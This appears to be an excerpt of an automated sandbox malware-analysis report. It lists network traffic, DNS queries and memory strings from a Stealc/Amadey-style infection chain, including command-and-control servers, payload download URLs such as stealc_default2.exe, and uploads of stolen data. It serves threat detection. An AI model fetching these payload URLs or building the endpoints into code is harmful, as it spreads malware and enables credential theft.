Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: millyscroqwp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=sBOr2__JvJw5HmueYAPObC8xnz0hiG_8EoYfK4sb_Iw-1725376458-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: millyscroqwp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=vs_WoD9E9ls5e42SrgOx0FeAK6AKPre4JrImmdAFRZ8-1725376477-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary86491233User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: fivexv5pn.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary40392606User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 77712Host: fivexv5pn.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70400459User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30045Host: fivexv5pn.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary27274414User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: thirtv13vt.top

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 95.179.250.45
Source: unknown	TCP traffic detected without corresponding DNS query: 95.179.250.45
Source: unknown	TCP traffic detected without corresponding DNS query: 95.179.250.45
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_0047A879 SetCurrentDirectoryA,GetUserNameA,CoInitialize,GetLocalTime,CoInitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,

19_2_0047A879

Source: global traffic	HTTP traffic detected: GET /get/5dfLDESaxz/crypted.exe HTTP/1.1Host: transfer.adminforge.de
Source: global traffic	HTTP traffic detected: GET /3823166/crypted.exe?hash=AgADZl HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: GET /inc/crypteda.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic	HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3846636/Set-up.exe?hash=AgADDB HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3846244/1.exe?hash=AgADek HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3858015/Setup.exe?hash=AgADYg HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/sqlite3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/Amadeus.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/freebl3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/mozglue.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/msvcp140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/nss3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3840509/build.exe?hash=AgADNB HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/softokn3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/vcruntime140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/runtime.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /ProlongedPortable.dll HTTP/1.1Host: 185.215.113.19Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Files/channel3.exe HTTP/1.1Host: 103.130.147.211
Source: global traffic	HTTP traffic detected: GET /ProlongedPortable.dll HTTP/1.1Host: 185.215.113.19Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ProlongedPortable.dll HTTP/1.1Host: 185.215.113.19Connection: Keep-Alive

Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.000000000325F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@ equals www.youtube.com (Youtube)
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.000000000325F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
Source: build.exe, 0000001C.00000002.2400677209.000000000325F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`, equals www.youtube.com (Youtube)
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.000000000325F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.000000000325F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ddl.safone.dev
Source: global traffic	DNS traffic detected: DNS query: fivexv5vs.top
Source: global traffic	DNS traffic detected: DNS query: fivexv5pn.top
Source: global traffic	DNS traffic detected: DNS query: millyscroqwp.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: transfer.adminforge.de
Source: global traffic	DNS traffic detected: DNS query: thirtv13vt.top

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: millyscroqwp.shop

Source: AppLaunch.exe, 0000001F.00000002.2753292846.0000000005355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.130.147.211/Files/channel3.exe
Source: AppLaunch.exe, 0000001F.00000002.2753292846.0000000005355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.130.147.211/Files/channel3.exe-f
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php$v
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php$vsg
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/d
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php00005001
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php00243001
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php243001
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3001
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpUsers
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded&
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedQ
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded~
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Local
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/Amadeus.exe
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/crypteda.exe
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/runtime.exe
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe$
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe=
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ubert
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A1C000.00000004.00000001.01000000.00000015.sdmp, stealc_default2.exe, 00000016.00000002.2262384371.0000000000B8D000.00000004.00000001.01000000.00000015.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php.dllN
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php/
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php3
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php3b
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php7
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpE
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpK
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpS
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php_
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpdll
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpf
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpnCash
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000B8D000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpw
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpwser
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dllT
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllL
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllZ
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllT
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllH
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2262384371.0000000000A4A000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dllV
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000B8D000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17Z
Source: runtime.exe, 0000001E.00000002.2503853991.0000000002546000.00000004.00000800.00020000.00000000.sdmp, runtime.exe, 00000023.00000002.2767317334.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, runtime.exe, 0000002C.00000002.2706063855.000000000272E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19
Source: AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php
Source: AppLaunch.exe, 0000001F.00000002.2768915081.000000000715D000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2753292846.000000000537C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=1
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=13ad
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=19
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=197RdC
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=19:RkC
Source: AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=19?;
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=19FQ
Source: AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=19k;
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.php?scr=19lJ
Source: AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/CoreOPT/index.phpW
Source: runtime.exe, 0000001E.00000002.2503853991.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, runtime.exe, 00000023.00000002.2767317334.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, runtime.exe, 0000002C.00000002.2706063855.00000000026A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/ProlongedPortable.dll
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/15.113.26/
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php$
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php1
Source: Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php2
